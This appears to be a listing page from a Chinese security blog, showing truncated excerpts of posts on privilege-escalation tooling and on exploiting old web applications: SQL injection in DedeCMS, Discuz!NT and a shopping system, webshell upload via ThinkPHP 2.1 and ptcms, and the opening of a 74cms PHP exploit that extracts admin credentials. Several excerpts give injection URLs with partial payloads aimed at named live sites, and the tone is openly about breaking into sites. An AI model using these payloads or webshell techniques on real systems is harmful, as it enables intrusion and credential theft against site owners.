Windows-Exploit-Suggester --- Windows下提权辅助工具

分类:安全 | 2016-09-24 | 撸过 1,845 次
0人扯谈

此工具是一款非常好用的Windows下提权辅助工具(已经支持Windows 10下的提权了),国内已经有许多人在用了,但是一直没有相应的中文文档,所以我特地翻译了一下,水平有限,如有错误,欢迎指出,谢谢。

描述

该工具可以将目标系统的补丁安装情况与微软的漏洞数据库进行对比,进而检测出目标系统中潜在的未修复漏洞。同时此工具还会告知用户针对于此漏洞是否有公开的exp和可用的Metasploit模块。

同时它可以使用–update参数去自动化地从微软下载漏洞补丁数据库,并将其以Excel表格的形式保存。

需要注意的是,此工具首先会假定目标系统存在所有漏洞,然后再基于系统补丁情[......]

继续阅读

ThinkPHP 2.1 漏洞可拿webshell

分类:安全 | 2012-08-23 | 撸过 4,214 次
0人扯谈

这个0day是一个月前爆出来的,为什么我今天说呢,因为今天我遇到了一个学弟用这个带漏洞的系统改框架码代码,他是去年用这套系统为西电写的网络攻防大赛的主页,那个时候0day还没爆出,所以网站一直幸免于难,但是,最近西电又要举办一次网络攻防大赛了,他还是用这套系统,那我就要义不容辞的上它了   嗷哈哈

晚上他和我聊  要我出比赛的有关题目  然后扔了个连接给我

我看了下  系统还是以前的那个thinkphp 2.1的版本

我们来分析下漏洞

官方发布了一个安全补丁

表述是:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。

官方的补丁:

/trunk/ThinkPHP/[......]

继续阅读

网趣网上购物系统旗舰版(免费版)SQL注入漏洞

分类:安全 | 2012-07-20 | 撸过 650 次
0人扯谈

 

版本:网趣网上购物系统旗舰版(免费版)

下载:http://www.cnhww.com/down.asp?id=6

----------------------------------------------------------------------

第一处:

/research.asp

对selectname未进行任何过滤,造成搜索型注入

code:

7-12行

dim action,searchkey,anclassid,jiage,selectnameanclassid=request("anclassid")searchkey=request("s[......]

继续阅读

织梦5.7注入加上传漏洞

分类:安全 | 2012-05-5 | 撸过 3,100 次
2人扯谈

会员中心查询会员信息语句过滤不严,导致url可提交注入参数;

会员中心上传动作过滤不严,导致上传漏洞

详细说明:

①注入漏洞

这站 http://www.webshell.cc/

首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,

然后访问

“/member/ajax_membergroup.php?action=post&membergroup=1”

页面,如图说明存在该漏洞

然后写上语句

查看管理员帐号

https://www.webshell.cc//member/ajax_membergroup.php?action=post&[......]

继续阅读

杰奇CMS 漏洞

分类:安全 | 2012-04-28 | 撸过 3,207 次
1人扯谈

杰奇CMS ( Jieqi CMS) 是一套以小说系统为主的CMS,目前的最新版本是1.7,在小说类的站中使用率还是比较高的,这几天花了点时间看了一下他的代码,觉得挺有意思的,跟大家分享一下。

整个系统核心代码是zend加密的,dezend之后看了一下。先从最几率最大的select型注入看起,但是发现所有地方GET过去的参数,最后都会带入\lib\database\database.php中组合SQL语句,再带入到jieqimysqldatabase类(\lib\database\mysql\db.php)的query方法进行最后的执行。

仔细查看后发现不可利用,因为如果是数字型的[......]

继续阅读

COCOON Counter统计程序漏洞总结

分类:安全 | 2012-02-27 | 撸过 413 次
0人扯谈

一、默认数据库:

counter/_db/db_CC_Counter6.mdb

也可直接打开:http://www.webshell.cc/Counter/utilities/update.asp

查看源文件,查找<! ,就可以找到数据库的地址。程序的问题。

二、暴路径漏洞

利用探针https://www.webshell.cc/Counter/utilities/aspSysCheck.asp,查看网站路径。

三、注入

存在用户注入,猜解出用户的帐号和密码,无法拿SHELL只可社工利用。

https://www.webshell.cc/xxcount/core/defaul[......]

继续阅读

很久以前的EXP 74cms 漏洞!

分类:安全 | 2012-02-25 | 撸过 731 次
1人扯谈

不解释了!

<?php
/*
骑士CMS漏洞利用Exp
Author:mer4en7y[90sec Team]
Home:www.90sec.org
声明:漏洞发现者:毅心毅意(发布在t00ls)
在日站的时候,碰到了这个系统,于是搞了这么个EXP,
水平有限,写的粗糙了点,忘大牛无见笑
大部分代码参考了子仪牛
*/
/*利用方法:$host:主机,$user修改为注册的用户名
$pwd修改为注册用户密码
登陆-->查看个人资料-->
在email处即可看到admin账号\密码\Hash
*/
error_reporting(0);
ini_set(max_execution[......]

继续阅读

申通快递官网爆注入漏洞

分类:安全 | 2012-02-20 | 撸过 518 次
3人扯谈

[......]

继续阅读

DNT存在SQL注入漏洞

分类:安全 | 2012-02-19 | 撸过 442 次
0人扯谈

注入地址:

http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1

利用:

http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%[......]

继续阅读

ptcms小说小偷程序 最新EXP漏洞

分类:安全 | 2012-02-19 | 撸过 827 次
2人扯谈

于没有带到数据库检测 而是直接验证程序内有没有这个文件名的文件夹,

那么我们注册../../1.asp; 或者../../2.asp

然后在书架或者收藏哪里插入一句话,

对应的木马地址是

 

http://www.webshell.cc/1.asp/mark.ptv

ps://针对解析漏洞的 鸡肋

下面放出落叶的exp 怕在下面大家看不到哈。

<?php
//error_reporting(0);
print_r('
+------------------------------------------------------------------------[......]

继续阅读

第 1 页,共 4 页1234